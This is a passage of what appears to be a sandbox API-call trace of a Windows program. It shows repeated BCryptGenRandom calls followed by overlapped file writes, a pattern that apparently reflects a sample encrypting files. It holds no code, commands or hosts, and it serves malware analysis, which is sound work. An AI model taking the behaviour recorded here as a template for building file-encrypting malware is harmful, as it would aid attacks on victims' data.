LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.733] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0182.733] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.733] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0182.733] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0182.733] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0182.733] free (_Block=0x3e305b8) [0182.733] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0182.733] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0182.734] free (_Block=0x1fa91d0) [0182.734] free (_Block=0x1fa2ed8) [0182.734] free (_Block=0x1fa90b8) [0182.734] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0182.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0183.606] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.606] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0183.606] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.607] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0183.607] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0183.607] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0183.607] free (_Block=0x3e305b8) [0183.607] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0183.607] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0183.608] free (_Block=0x1fa91d0) [0183.608] free (_Block=0x1fa2ed8) [0183.608] free (_Block=0x1fa90b8) [0183.608] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0183.610] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0183.611] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x11e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0183.611] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0183.631] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.736] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0183.736] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.737] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0183.737] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0183.737] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0183.737] free (_Block=0x3e305b8) [0183.737] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0183.737] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0183.737] free (_Block=0x1fa91d0) [0183.737] free (_Block=0x1fa2ed8) [0183.737] free (_Block=0x1fa90b8) [0183.738] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0183.738] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0183.739] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1330, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0183.739] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0184.474] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.475] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0184.475] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.475] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0184.475] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0184.475] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0184.475] free (_Block=0x3e305b8) [0184.475] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0184.475] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0184.476] free (_Block=0x1fa91d0) [0184.476] free (_Block=0x1fa2ed8) [0184.476] free (_Block=0x1fa90b8) [0184.476] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0184.477] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0184.477] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x20f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0184.478] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0184.494] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.495] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0184.505] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.506] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0184.506] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0184.506] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0184.506] free (_Block=0x3e305b8) [0184.506] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0184.506] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0184.506] free (_Block=0x1fa91d0) [0184.506] free (_Block=0x1fa2ed8) [0184.506] free (_Block=0x1fa90b8) [0184.507] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0184.605] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0185.505] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.627] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0185.627] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.628] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0185.628] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.628] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.628] free (_Block=0x3e305b8) [0185.628] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.628] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0185.628] free (_Block=0x1fa91d0) [0185.629] free (_Block=0x1fa2ed8) [0185.629] free (_Block=0x1fa90b8) [0185.629] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0185.629] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0185.761] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.765] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0185.782] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.928] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0185.928] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0185.928] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0185.928] free (_Block=0x3e305b8) [0185.928] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0185.928] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0185.929] free (_Block=0x1fa91d0) [0185.929] free (_Block=0x1fa2ed8) [0185.929] free (_Block=0x1fa90b8) [0185.929] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0185.929] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0185.933] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0185.933] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0187.465] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.588] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0187.588] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.588] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0187.589] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0187.589] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0187.589] free (_Block=0x3e305b8) [0187.589] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0187.589] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0187.589] free (_Block=0x1fa91d0) [0187.589] free (_Block=0x1fa2ed8) [0187.589] free (_Block=0x1fa90b8) [0187.589] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0187.589] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0187.604] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.605] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0187.605] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.605] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0187.605] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0187.605] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0187.605] free (_Block=0x3e305b8) [0187.605] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0187.605] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0187.606] free (_Block=0x1fa91d0) [0187.606] free (_Block=0x1fa2ed8) [0187.606] free (_Block=0x1fa90b8) [0187.606] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0187.607] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0190.185] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0xd2e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0190.186] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0190.189] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0190.205] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0190.217] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0190.217] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.218] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.218] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0190.218] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0190.218] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0190.218] free (_Block=0x3e305b8) [0190.218] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0190.218] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0190.219] free (_Block=0x1fa91d0) [0190.219] free (_Block=0x1fa2ed8) [0190.219] free (_Block=0x1fa90b8) [0190.219] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0190.221] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0190.235] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x3bed0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0190.237] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0190.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0190.251] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0190.252] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0190.252] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0190.252] free (_Block=0x3e305b8) [0190.252] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0190.252] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0190.252] free (_Block=0x1fa91d0) [0190.252] free (_Block=0x1fa2ed8) [0190.252] free (_Block=0x1fa90b8) [0190.252] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0190.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0190.269] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.270] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0190.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.270] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0190.271] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0190.271] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0190.271] free (_Block=0x3e305b8) [0190.271] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0190.271] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0190.271] free (_Block=0x1fa91d0) [0190.271] free (_Block=0x1fa2ed8) [0190.271] free (_Block=0x1fa90b8) [0190.271] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0190.276] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0190.288] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.288] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0190.288] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.289] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0190.289] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0190.289] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0190.289] free (_Block=0x3e305b8) [0190.289] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0190.289] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0190.290] free (_Block=0x1fa91d0) [0190.290] free (_Block=0x1fa2ed8) [0190.290] free (_Block=0x1fa90b8) [0190.290] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0190.298] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0190.306] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.307] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0190.307] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.307] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0190.308] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0190.308] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0190.308] free (_Block=0x3e305b8) [0190.308] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0190.308] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0190.308] free (_Block=0x1fa91d0) [0190.308] free (_Block=0x1fa2ed8) [0190.308] free (_Block=0x1fa90b8) [0190.308] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, 